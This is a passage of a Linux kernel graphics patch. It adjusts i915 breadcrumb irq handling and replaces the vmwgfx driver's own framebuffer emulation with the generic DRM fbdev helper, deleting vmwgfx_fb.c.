++	/* Lazy irq enabling after HW submission */
+ 	if (!READ_ONCE(b->irq_armed) && !list_empty(&b->signalers))
+ 		intel_breadcrumbs_arm_irq(b);
++
++	/* And confirm that we still want irqs enabled before we yield */
++	if (READ_ONCE(b->irq_armed) && !atomic_read(&b->active))
++		intel_breadcrumbs_disarm_irq(b);
+ }
+ 
+ struct intel_breadcrumbs *
+@@ -310,13 +315,7 @@ void __intel_breadcrumbs_park(struct intel_breadcrumbs *b)
+ 		return;
+ 
+ 	/* Kick the work once more to drain the signalers, and disarm the irq */
+-	irq_work_sync(&b->irq_work);
+-	while (READ_ONCE(b->irq_armed) && !atomic_read(&b->active)) {
+-		local_irq_disable();
+-		signal_irq_work(&b->irq_work);
+-		local_irq_enable();
+-		cond_resched();
+-	}
++	irq_work_queue(&b->irq_work);
+ }
+ 
+ void intel_breadcrumbs_free(struct kref *kref)
+@@ -399,7 +398,7 @@ static void insert_breadcrumb(struct i915_request *rq)
+ 	 * the request as it may have completed and raised the interrupt as
+ 	 * we were attaching it into the lists.
+ 	 */
+-	if (!b->irq_armed || __i915_request_is_complete(rq))
++	if (!READ_ONCE(b->irq_armed) || __i915_request_is_complete(rq))
+ 		irq_work_queue(&b->irq_work);
+ }
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/Kconfig b/drivers/gpu/drm/vmwgfx/Kconfig
+index a4fabe208d9f0..faddae3d6ac2e 100644
+--- a/drivers/gpu/drm/vmwgfx/Kconfig
++++ b/drivers/gpu/drm/vmwgfx/Kconfig
+@@ -16,13 +16,6 @@ config DRM_VMWGFX
+ 	  virtual hardware.
+ 	  The compiled module will be called "vmwgfx.ko".
+ 
+-config DRM_VMWGFX_FBCON
+-	depends on DRM_VMWGFX && DRM_FBDEV_EMULATION
+-	bool "Enable framebuffer console under vmwgfx by default"
+-	help
+-	   Choose this option if you are shipping a new vmwgfx
+-	   userspace driver that supports using the kernel driver.
+-
+ config DRM_VMWGFX_MKSSTATS
+ 	bool "Enable mksGuestStats instrumentation of vmwgfx by default"
+ 	depends on DRM_VMWGFX
+diff --git a/drivers/gpu/drm/vmwgfx/Makefile b/drivers/gpu/drm/vmwgfx/Makefile
+index 68e350f410ad3..2a644f035597f 100644
+--- a/drivers/gpu/drm/vmwgfx/Makefile
++++ b/drivers/gpu/drm/vmwgfx/Makefile
+@@ -12,6 +12,4 @@ vmwgfx-y := vmwgfx_execbuf.o vmwgfx_gmr.o vmwgfx_kms.o vmwgfx_drv.o \
+ 	    vmwgfx_devcaps.o ttm_object.o vmwgfx_system_manager.o \
+ 	    vmwgfx_gem.o
+ 
+-vmwgfx-$(CONFIG_DRM_FBDEV_EMULATION) += vmwgfx_fb.o
+-
+ obj-$(CONFIG_DRM_VMWGFX) := vmwgfx.o
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+index 53f63ad656a41..be27f9a3bf67b 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+@@ -35,6 +35,7 @@
+ 
+ #include <drm/drm_aperture.h>
+ #include <drm/drm_drv.h>
++#include <drm/drm_fb_helper.h>
+ #include <drm/drm_gem_ttm_helper.h>
+ #include <drm/drm_ioctl.h>
+ #include <drm/drm_module.h>
+@@ -52,9 +53,6 @@
+ 
+ #define VMWGFX_DRIVER_DESC "Linux drm driver for VMware graphics devices"
+ 
+-#define VMW_MIN_INITIAL_WIDTH 800
+-#define VMW_MIN_INITIAL_HEIGHT 600
+-
+ /*
+  * Fully encoded drm commands. Might move to vmw_drm.h
+  */
+@@ -265,7 +263,6 @@ static const struct pci_device_id vmw_pci_id_list[] = {
+ };
+ MODULE_DEVICE_TABLE(pci, vmw_pci_id_list);
+ 
+-static int enable_fbdev = IS_ENABLED(CONFIG_DRM_VMWGFX_FBCON);
+ static int vmw_restrict_iommu;
+ static int vmw_force_coherent;
+ static int vmw_restrict_dma_mask;
+@@ -275,8 +272,6 @@ static int vmw_probe(struct pci_dev *, const struct pci_device_id *);
+ static int vmwgfx_pm_notifier(struct notifier_block *nb, unsigned long val,
+ 			      void *ptr);
+ 
+-MODULE_PARM_DESC(enable_fbdev, "Enable vmwgfx fbdev");
+-module_param_named(enable_fbdev, enable_fbdev, int, 0600);
+ MODULE_PARM_DESC(restrict_iommu, "Try to limit IOMMU usage for TTM pages");
+ module_param_named(restrict_iommu, vmw_restrict_iommu, int, 0600);
+ MODULE_PARM_DESC(force_coherent, "Force coherent TTM pages");
+@@ -626,8 +621,8 @@ static void vmw_get_initial_size(struct vmw_private *dev_priv)
+ 	width = vmw_read(dev_priv, SVGA_REG_WIDTH);
+ 	height = vmw_read(dev_priv, SVGA_REG_HEIGHT);
+ 
+-	width = max_t(uint32_t, width, VMW_MIN_INITIAL_WIDTH);
+-	height = max_t(uint32_t, height, VMW_MIN_INITIAL_HEIGHT);
++	width = max_t(uint32_t, width, VMWGFX_MIN_INITIAL_WIDTH);
++	height = max_t(uint32_t, height, VMWGFX_MIN_INITIAL_HEIGHT);
+ 
+ 	if (width > dev_priv->fb_max_width ||
+ 	    height > dev_priv->fb_max_height) {
+@@ -636,8 +631,8 @@ static void vmw_get_initial_size(struct vmw_private *dev_priv)
+ 		 * This is a host error and shouldn't occur.
+ 		 */
+ 
+-		width = VMW_MIN_INITIAL_WIDTH;
+-		height = VMW_MIN_INITIAL_HEIGHT;
++		width  = VMWGFX_MIN_INITIAL_WIDTH;
++		height = VMWGFX_MIN_INITIAL_HEIGHT;
+ 	}
+ 
+ 	dev_priv->initial_width = width;
+@@ -887,9 +882,6 @@ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ 
+ 	dev_priv->assume_16bpp = !!vmw_assume_16bpp;
+ 
+-	dev_priv->enable_fb = enable_fbdev;
+-
+-
+ 	dev_priv->capabilities = vmw_read(dev_priv, SVGA_REG_CAPABILITIES);
+ 	vmw_print_bitmap(&dev_priv->drm, "Capabilities",
+ 			 dev_priv->capabilities,
+@@ -946,13 +938,6 @@ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ 				vmw_read(dev_priv,
+ 					 SVGA_REG_SUGGESTED_GBOBJECT_MEM_SIZE_KB);
+ 
+-		/*
+-		 * Workaround for low memory 2D VMs to compensate for the
+-		 * allocation taken by fbdev
+-		 */
+-		if (!(dev_priv->capabilities & SVGA_CAP_3D))
+-			mem_size *= 3;
+-
+ 		dev_priv->max_mob_pages = mem_size * 1024 / PAGE_SIZE;
+ 		dev_priv->max_primary_mem =
+ 			vmw_read(dev_priv, SVGA_REG_MAX_PRIMARY_MEM);
+@@ -1136,12 +1121,6 @@ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ 			VMWGFX_DRIVER_PATCHLEVEL, UTS_RELEASE);
+ 	vmw_write_driver_id(dev_priv);
+ 
+-	if (dev_priv->enable_fb) {
+-		vmw_fifo_resource_inc(dev_priv);
+-		vmw_svga_enable(dev_priv);
+-		vmw_fb_init(dev_priv);
+-	}
+-
+ 	dev_priv->pm_nb.notifier_call = vmwgfx_pm_notifier;
+ 	register_pm_notifier(&dev_priv->pm_nb);
+ 
+@@ -1188,12 +1167,9 @@ static void vmw_driver_unload(struct drm_device *dev)
+ 	unregister_pm_notifier(&dev_priv->pm_nb);
+ 
+ 	vmw_sw_context_fini(dev_priv);
+-	if (dev_priv->enable_fb) {
+-		vmw_fb_off(dev_priv);
+-		vmw_fb_close(dev_priv);
+-		vmw_fifo_resource_dec(dev_priv);
+-		vmw_svga_disable(dev_priv);
+-	}
++	vmw_fifo_resource_dec(dev_priv);
++
++	vmw_svga_disable(dev_priv);
+ 
+ 	vmw_kms_close(dev_priv);
+ 	vmw_overlay_close(dev_priv);
+@@ -1331,8 +1307,6 @@ static void vmw_master_drop(struct drm_device *dev,
+ 	struct vmw_private *dev_priv = vmw_priv(dev);
+ 
+ 	vmw_kms_legacy_hotspot_clear(dev_priv);
+-	if (!dev_priv->enable_fb)
+-		vmw_svga_disable(dev_priv);
+ }
+ 
+ /**
+@@ -1528,25 +1502,19 @@ static int vmw_pm_freeze(struct device *kdev)
+ 		DRM_ERROR("Failed to freeze modesetting.\n");
+ 		return ret;
+ 	}
+-	if (dev_priv->enable_fb)
+-		vmw_fb_off(dev_priv);
+ 
+ 	vmw_execbuf_release_pinned_bo(dev_priv);
+ 	vmw_resource_evict_all(dev_priv);
+ 	vmw_release_device_early(dev_priv);
+ 	while (ttm_device_swapout(&dev_priv->bdev, &ctx, GFP_KERNEL) > 0);
+-	if (dev_priv->enable_fb)
+-		vmw_fifo_resource_dec(dev_priv);
++	vmw_fifo_resource_dec(dev_priv);
+ 	if (atomic_read(&dev_priv->num_fifo_resources) != 0) {
+ 		DRM_ERROR("Can't hibernate while 3D resources are active.\n");
+-		if (dev_priv->enable_fb)
+-			vmw_fifo_resource_inc(dev_priv);
++		vmw_fifo_resource_inc(dev_priv);
+ 		WARN_ON(vmw_request_device_late(dev_priv));
+ 		dev_priv->suspend_locked = false;
+ 		if (dev_priv->suspend_state)
+ 			vmw_kms_resume(dev);
+-		if (dev_priv->enable_fb)
+-			vmw_fb_on(dev_priv);
+ 		return -EBUSY;
+ 	}
+ 
+@@ -1566,24 +1534,19 @@ static int vmw_pm_restore(struct device *kdev)
+ 
+ 	vmw_detect_version(dev_priv);
+ 
+-	if (dev_priv->enable_fb)
+-		vmw_fifo_resource_inc(dev_priv);
++	vmw_fifo_resource_inc(dev_priv);
+ 
+ 	ret = vmw_request_device(dev_priv);
+ 	if (ret)
+ 		return ret;
+ 
+-	if (dev_priv->enable_fb)
+-		__vmw_svga_enable(dev_priv);
++	__vmw_svga_enable(dev_priv);
+ 
+ 	vmw_fence_fifo_up(dev_priv->fman);
+ 	dev_priv->suspend_locked = false;
+ 	if (dev_priv->suspend_state)
+ 		vmw_kms_resume(&dev_priv->drm);
+ 
+-	if (dev_priv->enable_fb)
+-		vmw_fb_on(dev_priv);
+-
+ 	return 0;
+ }
+ 
+@@ -1674,6 +1637,10 @@ static int vmw_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	if (ret)
+ 		goto out_unload;
+ 
++	vmw_fifo_resource_inc(vmw);
++	vmw_svga_enable(vmw);
++	drm_fbdev_generic_setup(&vmw->drm,  0);
++
+ 	vmw_debugfs_gem_init(vmw);
+ 	vmw_debugfs_resource_managers_init(vmw);
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+index 136f1cdcf8cdf..b0c23559511a1 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+@@ -62,6 +62,9 @@
+ #define VMWGFX_MAX_DISPLAYS 16
+ #define VMWGFX_CMD_BOUNCE_INIT_SIZE 32768
+ 
++#define VMWGFX_MIN_INITIAL_WIDTH 1280
++#define VMWGFX_MIN_INITIAL_HEIGHT 800
++
+ #define VMWGFX_PCI_ID_SVGA2              0x0405
+ #define VMWGFX_PCI_ID_SVGA3              0x0406
+ 
+@@ -551,7 +554,6 @@ struct vmw_private {
+ 	 * Framebuffer info.
+ 	 */
+ 
+-	void *fb_info;
+ 	enum vmw_display_unit_type active_display_unit;
+ 	struct vmw_legacy_display *ldu_priv;
+ 	struct vmw_overlay *overlay_priv;
+@@ -610,8 +612,6 @@ struct vmw_private {
+ 	struct mutex cmdbuf_mutex;
+ 	struct mutex binding_mutex;
+ 
+-	bool enable_fb;
+-
+ 	/**
+ 	 * PM management.
+ 	 */
+@@ -1178,35 +1178,6 @@ extern void vmw_generic_waiter_add(struct vmw_private *dev_priv, u32 flag,
+ extern void vmw_generic_waiter_remove(struct vmw_private *dev_priv,
+ 				      u32 flag, int *waiter_count);
+ 
+-
+-/**
+- * Kernel framebuffer - vmwgfx_fb.c
+- */
+-
+-#ifdef CONFIG_DRM_FBDEV_EMULATION
+-int vmw_fb_init(struct vmw_private *vmw_priv);
+-int vmw_fb_close(struct vmw_private *dev_priv);
+-int vmw_fb_off(struct vmw_private *vmw_priv);
+-int vmw_fb_on(struct vmw_private *vmw_priv);
+-#else
+-static inline int vmw_fb_init(struct vmw_private *vmw_priv)
+-{
+-	return 0;
+-}
+-static inline int vmw_fb_close(struct vmw_private *dev_priv)
+-{
+-	return 0;
+-}
+-static inline int vmw_fb_off(struct vmw_private *vmw_priv)
+-{
+-	return 0;
+-}
+-static inline int vmw_fb_on(struct vmw_private *vmw_priv)
+-{
+-	return 0;
+-}
+-#endif
+-
+ /**
+  * Kernel modesetting - vmwgfx_kms.c
+  */
+@@ -1223,9 +1194,6 @@ void vmw_kms_cursor_snoop(struct vmw_surface *srf,
+ int vmw_kms_write_svga(struct vmw_private *vmw_priv,
+ 		       unsigned width, unsigned height, unsigned pitch,
+ 		       unsigned bpp, unsigned depth);
+-bool vmw_kms_validate_mode_vram(struct vmw_private *dev_priv,
+-				uint32_t pitch,
+-				uint32_t height);
+ int vmw_kms_present(struct vmw_private *dev_priv,
+ 		    struct drm_file *file_priv,
+ 		    struct vmw_framebuffer *vfb,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_fb.c b/drivers/gpu/drm/vmwgfx/vmwgfx_fb.c
+deleted file mode 100644
+index 5b85b477e4c69..0000000000000
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_fb.c
++++ /dev/null
+@@ -1,831 +0,0 @@
+-/**************************************************************************
+- *
+- * Copyright © 2007 David Airlie
+- * Copyright © 2009-2015 VMware, Inc., Palo Alto, CA., USA
+- * All Rights Reserved.
+- *
+- * Permission is hereby granted, free of charge, to any person obtaining a
+- * copy of this software and associated documentation files (the
+- * "Software"), to deal in the Software without restriction, including
+- * without limitation the rights to use, copy, modify, merge, publish,
+- * distribute, sub license, and/or sell copies of the Software, and to
+- * permit persons to whom the Software is furnished to do so, subject to
+- * the following conditions:
+- *
+- * The above copyright notice and this permission notice (including the
+- * next paragraph) shall be included in all copies or substantial portions
+- * of the Software.
+- *
+- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+- * FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
+- * THE COPYRIGHT HOLDERS, AUTHORS AND/OR ITS SUPPLIERS BE LIABLE FOR ANY CLAIM,
+- * DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
+- * OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
+- * USE OR OTHER DEALINGS IN THE SOFTWARE.
+- *
+- **************************************************************************/
+-
+-#include <linux/fb.h>
+-#include <linux/pci.h>
+-
+-#include <drm/drm_fourcc.h>
+-#include <drm/ttm/ttm_placement.h>
+-
+-#include "vmwgfx_drv.h"
+-#include "vmwgfx_kms.h"
+-
+-#define VMW_DIRTY_DELAY (HZ / 30)
+-
+-struct vmw_fb_par {
+-	struct vmw_private *vmw_priv;
+-
+-	void *vmalloc;
+-
+-	struct mutex bo_mutex;
+-	struct vmw_buffer_object *vmw_bo;
+-	unsigned bo_size;
+-	struct drm_framebuffer *set_fb;
+-	struct drm_display_mode *set_mode;
+-	u32 fb_x;
+-	u32 fb_y;
+-	bool bo_iowrite;
+-
+-	u32 pseudo_palette[17];
+-
+-	unsigned max_width;
+-	unsigned max_height;
+-
+-	struct {
+-		spinlock_t lock;
+-		bool active;
+-		unsigned x1;
+-		unsigned y1;
+-		unsigned x2;
+-		unsigned y2;
+-	} dirty;
+-
+-	struct drm_crtc *crtc;
+-	struct drm_connector *con;
+-	struct delayed_work local_work;
+-};
+-
+-static int vmw_fb_setcolreg(unsigned regno, unsigned red, unsigned green,
+-			    unsigned blue, unsigned transp,
+-			    struct fb_info *info)
+-{
+-	struct vmw_fb_par *par = info->par;
+-	u32 *pal = par->pseudo_palette;
+-
+-	if (regno > 15) {
+-		DRM_ERROR("Bad regno %u.\n", regno);
+-		return 1;
+-	}
+-
+-	switch (par->set_fb->format->depth) {
+-	case 24:
+-	case 32:
+-		pal[regno] = ((red & 0xff00) << 8) |
+-			      (green & 0xff00) |
+-			     ((blue  & 0xff00) >> 8);
+-		break;
+-	default:
+-		DRM_ERROR("Bad depth %u, bpp %u.\n",
+-			  par->set_fb->format->depth,
+-			  par->set_fb->format->cpp[0] * 8);
+-		return 1;
+-	}
+-
+-	return 0;
+-}
+-
+-static int vmw_fb_check_var(struct fb_var_screeninfo *var,
+-			    struct fb_info *info)
+-{
+-	int depth = var->bits_per_pixel;
+-	struct vmw_fb_par *par = info->par;
+-	struct vmw_private *vmw_priv = par->vmw_priv;
+-
+-	switch (var->bits_per_pixel) {
+-	case 32:
+-		depth = (var->transp.length > 0) ? 32 : 24;
+-		break;
+-	default:
+-		DRM_ERROR("Bad bpp %u.\n", var->bits_per_pixel);
+-		return -EINVAL;
+-	}
+-
+-	switch (depth) {
+-	case 24:
+-		var->red.offset = 16;
+-		var->green.offset = 8;
+-		var->blue.offset = 0;
+-		var->red.length = 8;
+-		var->green.length = 8;
+-		var->blue.length = 8;
+-		var->transp.length = 0;
+-		var->transp.offset = 0;
+-		break;
+-	case 32:
+-		var->red.offset = 16;
+-		var->green.offset = 8;
+-		var->blue.offset = 0;
+-		var->red.length = 8;
+-		var->green.length = 8;
+-		var->blue.length = 8;
+-		var->transp.length = 8;
+-		var->transp.offset = 24;
+-		break;
+-	default:
+-		DRM_ERROR("Bad depth %u.\n", depth);
+-		return -EINVAL;
+-	}
+-
+-	if ((var->xoffset + var->xres) > par->max_width ||
+-	    (var->yoffset + var->yres) > par->max_height) {
+-		DRM_ERROR("Requested geom can not fit in framebuffer\n");
+-		return -EINVAL;
+-	}
+-
+-	if (!vmw_kms_validate_mode_vram(vmw_priv,
+-					var->xres * var->bits_per_pixel/8,
+-					var->yoffset + var->yres)) {
+-		DRM_ERROR("Requested geom can not fit in framebuffer\n");
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int vmw_fb_blank(int blank, struct fb_info *info)
+-{
+-	return 0;
+-}
+-
+-/**
+- * vmw_fb_dirty_flush - flush dirty regions to the kms framebuffer
+- *
+- * @work: The struct work_struct associated with this task.
+- *
+- * This function flushes the dirty regions of the vmalloc framebuffer to the
+- * kms framebuffer, and if the kms framebuffer is visible, also updated the
+- * corresponding displays. Note that this function runs even if the kms
+- * framebuffer is not bound to a crtc and thus not visible, but it's turned
+- * off during hibernation using the par->dirty.active bool.
+- */
+-static void vmw_fb_dirty_flush(struct work_struct *work)
+-{
+-	struct vmw_fb_par *par = container_of(work, struct vmw_fb_par,
+-					      local_work.work);
+-	struct vmw_private *vmw_priv = par->vmw_priv;
+-	struct fb_info *info = vmw_priv->fb_info;
+-	unsigned long irq_flags;
+-	s32 dst_x1, dst_x2, dst_y1, dst_y2, w = 0, h = 0;
+-	u32 cpp, max_x, max_y;
+-	struct drm_clip_rect clip;
+-	struct drm_framebuffer *cur_fb;
+-	u8 *src_ptr, *dst_ptr;
+-	struct vmw_buffer_object *vbo = par->vmw_bo;
+-	void *virtual;
+-
+-	if (!READ_ONCE(par->dirty.active))
+-		return;
+-
+-	mutex_lock(&par->bo_mutex);
+-	cur_fb = par->set_fb;
+-	if (!cur_fb)
+-		goto out_unlock;
+-
+-	(void) ttm_bo_reserve(&vbo->base, false, false, NULL);
+-	virtual = vmw_bo_map_and_cache(vbo);
+-	if (!virtual)
+-		goto out_unreserve;
+-
+-	spin_lock_irqsave(&par->dirty.lock, irq_flags);
+-	if (!par->dirty.active) {
+-		spin_unlock_irqrestore(&par->dirty.lock, irq_flags);
+-		goto out_unreserve;
+-	}
+-
+-	/*
+-	 * Handle panning when copying from vmalloc to framebuffer.
+-	 * Clip dirty area to framebuffer.
+-	 */
+-	cpp = cur_fb->format->cpp[0];
+-	max_x = par->fb_x + cur_fb->width;
+-	max_y = par->fb_y + cur_fb->height;
+-
+-	dst_x1 = par->dirty.x1 - par->fb_x;
+-	dst_y1 = par->dirty.y1 - par->fb_y;
+-	dst_x1 = max_t(s32, dst_x1, 0);
+-	dst_y1 = max_t(s32, dst_y1, 0);
+-
+-	dst_x2 = par->dirty.x2 - par->fb_x;
+-	dst_y2 = par->dirty.y2 - par->fb_y;
+-	dst_x2 = min_t(s32, dst_x2, max_x);
+-	dst_y2 = min_t(s32, dst_y2, max_y);
+-	w = dst_x2 - dst_x1;
+-	h = dst_y2 - dst_y1;
+-	w = max_t(s32, 0, w);
+-	h = max_t(s32, 0, h);
+-
+-	par->dirty.x1 = par->dirty.x2 = 0;
+-	par->dirty.y1 = par->dirty.y2 = 0;
+-	spin_unlock_irqrestore(&par->dirty.lock, irq_flags);
+-
+-	if (w && h) {
+-		dst_ptr = (u8 *)virtual  +
+-			(dst_y1 * par->set_fb->pitches[0] + dst_x1 * cpp);
+-		src_ptr = (u8 *)par->vmalloc +
+-			((dst_y1 + par->fb_y) * info->fix.line_length +
+-			 (dst_x1 + par->fb_x) * cpp);
+-
+-		while (h-- > 0) {
+-			memcpy(dst_ptr, src_ptr, w*cpp);
+-			dst_ptr += par->set_fb->pitches[0];
+-			src_ptr += info->fix.line_length;
+-		}
+-
+-		clip.x1 = dst_x1;
+-		clip.x2 = dst_x2;
+-		clip.y1 = dst_y1;
+-		clip.y2 = dst_y2;
+-	}
+-
+-out_unreserve:
+-	ttm_bo_unreserve(&vbo->base);
+-	if (w && h) {
+-		WARN_ON_ONCE(par->set_fb->funcs->dirty(cur_fb, NULL, 0, 0,
+-						       &clip, 1));
+-		vmw_cmd_flush(vmw_priv, false);
+-	}
+-out_unlock:
+-	mutex_unlock(&par->bo_mutex);
+-}
+-
+-static void vmw_fb_dirty_mark(struct vmw_fb_par *par,
+-			      unsigned x1, unsigned y1,
+-			      unsigned width, unsigned height)
+-{
+-	unsigned long flags;
+-	unsigned x2 = x1 + width;
+-	unsigned y2 = y1 + height;
+-
+-	spin_lock_irqsave(&par->dirty.lock, flags);
+-	if (par->dirty.x1 == par->dirty.x2) {
+-		par->dirty.x1 = x1;
+-		par->dirty.y1 = y1;
+-		par->dirty.x2 = x2;
+-		par->dirty.y2 = y2;
+-		/* if we are active start the dirty work
+-		 * we share the work with the defio system */
+-		if (par->dirty.active)
+-			schedule_delayed_work(&par->local_work,
+-					      VMW_DIRTY_DELAY);
+-	} else {
+-		if (x1 < par->dirty.x1)
+-			par->dirty.x1 = x1;
+-		if (y1 < par->dirty.y1)
+-			par->dirty.y1 = y1;
+-		if (x2 > par->dirty.x2)
+-			par->dirty.x2 = x2;
+-		if (y2 > par->dirty.y2)
+-			par->dirty.y2 = y2;
+-	}
+-	spin_unlock_irqrestore(&par->dirty.lock, flags);
+-}
+-
+-static int vmw_fb_pan_display(struct fb_var_screeninfo *var,
+-			      struct fb_info *info)
+-{
+-	struct vmw_fb_par *par = info->par;
+-
+-	if ((var->xoffset + var->xres) > var->xres_virtual ||
+-	    (var->yoffset + var->yres) > var->yres_virtual) {
+-		DRM_ERROR("Requested panning can not fit in framebuffer\n");
+-		return -EINVAL;
+-	}
+-
+-	mutex_lock(&par->bo_mutex);
+-	par->fb_x = var->xoffset;
+-	par->fb_y = var->yoffset;
+-	if (par->set_fb)
+-		vmw_fb_dirty_mark(par, par->fb_x, par->fb_y, par->set_fb->width,
+-				  par->set_fb->height);
+-	mutex_unlock(&par->bo_mutex);
+-
+-	return 0;
+-}
+-
+-static void vmw_deferred_io(struct fb_info *info, struct list_head *pagereflist)
+-{
+-	struct vmw_fb_par *par = info->par;
+-	unsigned long start, end, min, max;
+-	unsigned long flags;
+-	struct fb_deferred_io_pageref *pageref;
+-	int y1, y2;
+-
+-	min = ULONG_MAX;
+-	max = 0;
+-	list_for_each_entry(pageref, pagereflist, list) {
+-		start = pageref->offset;
+-		end = start + PAGE_SIZE - 1;
+-		min = min(min, start);
+-		max = max(max, end);
+-	}
+-
+-	if (min < max) {
+-		y1 = min / info->fix.line_length;
+-		y2 = (max / info->fix.line_length) + 1;
+-
+-		spin_lock_irqsave(&par->dirty.lock, flags);
+-		par->dirty.x1 = 0;
+-		par->dirty.y1 = y1;
+-		par->dirty.x2 = info->var.xres;
+-		par->dirty.y2 = y2;
+-		spin_unlock_irqrestore(&par->dirty.lock, flags);
+-
+-		/*
+-		 * Since we've already waited on this work once, try to
+-		 * execute asap.
+-		 */
+-		cancel_delayed_work(&par->local_work);
+-		schedule_delayed_work(&par->local_work, 0);
+-	}
+-};
+-
+-static struct fb_deferred_io vmw_defio = {
+-	.delay		= VMW_DIRTY_DELAY,
+-	.deferred_io	= vmw_deferred_io,
+-};
+-
+-/*
+- * Draw code
+- */
+-
+-static void vmw_fb_fillrect(struct fb_info *info, const struct fb_fillrect *rect)
+-{
+-	cfb_fillrect(info, rect);
+-	vmw_fb_dirty_mark(info->par, rect->dx, rect->dy,
+-			  rect->width, rect->height);
+-}
+-
+-static void vmw_fb_copyarea(struct fb_info *info, const struct fb_copyarea *region)
+-{
+-	cfb_copyarea(info, region);
+-	vmw_fb_dirty_mark(info->par, region->dx, region->dy,
+-			  region->width, region->height);
+-}
+-
+-static void vmw_fb_imageblit(struct fb_info *info, const struct fb_image *image)
+-{
+-	cfb_imageblit(info, image);
+-	vmw_fb_dirty_mark(info->par, image->dx, image->dy,
+-			  image->width, image->height);
+-}
+-
+-/*
+- * Bring up code
+- */
+-
+-static int vmw_fb_create_bo(struct vmw_private *vmw_priv,
+-			    size_t size, struct vmw_buffer_object **out)
+-{
+-	struct vmw_buffer_object *vmw_bo;
+-	int ret;
+-
+-	ret = vmw_bo_create(vmw_priv, size,
+-			      &vmw_sys_placement,
+-			      false, false,
+-			      &vmw_bo_bo_free, &vmw_bo);
+-	if (unlikely(ret != 0))
+-		return ret;
+-
+-	*out = vmw_bo;
+-
+-	return ret;
+-}
+-
+-static int vmw_fb_compute_depth(struct fb_var_screeninfo *var,
+-				int *depth)
+-{
+-	switch (var->bits_per_pixel) {
+-	case 32:
+-		*depth = (var->transp.length > 0) ? 32 : 24;
+-		break;
+-	default:
+-		DRM_ERROR("Bad bpp %u.\n", var->bits_per_pixel);
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int vmwgfx_set_config_internal(struct drm_mode_set *set)
+-{
+-	struct drm_crtc *crtc = set->crtc;
+-	struct drm_modeset_acquire_ctx ctx;
+-	int ret;
+-
+-	drm_modeset_acquire_init(&ctx, 0);
+-
+-restart:
+-	ret = crtc->funcs->set_config(set, &ctx);
+-
+-	if (ret == -EDEADLK) {
+-		drm_modeset_backoff(&ctx);
+-		goto restart;
+-	}
+-
+-	drm_modeset_drop_locks(&ctx);
+-	drm_modeset_acquire_fini(&ctx);
+-
+-	return ret;
+-}
+-
+-static int vmw_fb_kms_detach(struct vmw_fb_par *par,
+-			     bool detach_bo,
+-			     bool unref_bo)
+-{
+-	struct drm_framebuffer *cur_fb = par->set_fb;
+-	int ret;
+-
+-	/* Detach the KMS framebuffer from crtcs */
+-	if (par->set_mode) {
+-		struct drm_mode_set set;
+-
+-		set.crtc = par->crtc;
+-		set.x = 0;
+-		set.y = 0;
+-		set.mode = NULL;
+-		set.fb = NULL;
+-		set.num_connectors = 0;
+-		set.connectors = &par->con;
+-		ret = vmwgfx_set_config_internal(&set);
+-		if (ret) {
+-			DRM_ERROR("Could not unset a mode.\n");
+-			return ret;
+-		}
+-		drm_mode_destroy(&par->vmw_priv->drm, par->set_mode);
+-		par->set_mode = NULL;
+-	}
+-
+-	if (cur_fb) {
+-		drm_framebuffer_put(cur_fb);
+-		par->set_fb = NULL;
+-	}
+-
+-	if (par->vmw_bo && detach_bo && unref_bo)
+-		vmw_bo_unreference(&par->vmw_bo);
+-
+-	return 0;
+-}
+-
+-static int vmw_fb_kms_framebuffer(struct fb_info *info)
+-{
+-	struct drm_mode_fb_cmd2 mode_cmd = {0};
+-	struct vmw_fb_par *par = info->par;
+-	struct fb_var_screeninfo *var = &info->var;
+-	struct drm_framebuffer *cur_fb;
+-	struct vmw_framebuffer *vfb;
+-	int ret = 0, depth;
+-	size_t new_bo_size;
+-
+-	ret = vmw_fb_compute_depth(var, &depth);
+-	if (ret)
+-		return ret;
+-
+-	mode_cmd.width = var->xres;
+-	mode_cmd.height = var->yres;
+-	mode_cmd.pitches[0] = ((var->bits_per_pixel + 7) / 8) * mode_cmd.width;
+-	mode_cmd.pixel_format =
+-		drm_mode_legacy_fb_format(var->bits_per_pixel, depth);
+-
+-	cur_fb = par->set_fb;
+-	if (cur_fb && cur_fb->width == mode_cmd.width &&
+-	    cur_fb->height == mode_cmd.height &&
+-	    cur_fb->format->format == mode_cmd.pixel_format &&
+-	    cur_fb->pitches[0] == mode_cmd.pitches[0])
+-		return 0;
+-
+-	/* Need new buffer object ? */
+-	new_bo_size = (size_t) mode_cmd.pitches[0] * (size_t) mode_cmd.height;
+-	ret = vmw_fb_kms_detach(par,
+-				par->bo_size < new_bo_size ||
+-				par->bo_size > 2*new_bo_size,
+-				true);
+-	if (ret)
+-		return ret;
+-
+-	if (!par->vmw_bo) {
+-		ret = vmw_fb_create_bo(par->vmw_priv, new_bo_size,
+-				       &par->vmw_bo);
+-		if (ret) {
+-			DRM_ERROR("Failed creating a buffer object for "
+-				  "fbdev.\n");
+-			return ret;
+-		}
+-		par->bo_size = new_bo_size;
+-	}
+-
+-	vfb = vmw_kms_new_framebuffer(par->vmw_priv, par->vmw_bo, NULL,
+-				      true, &mode_cmd);
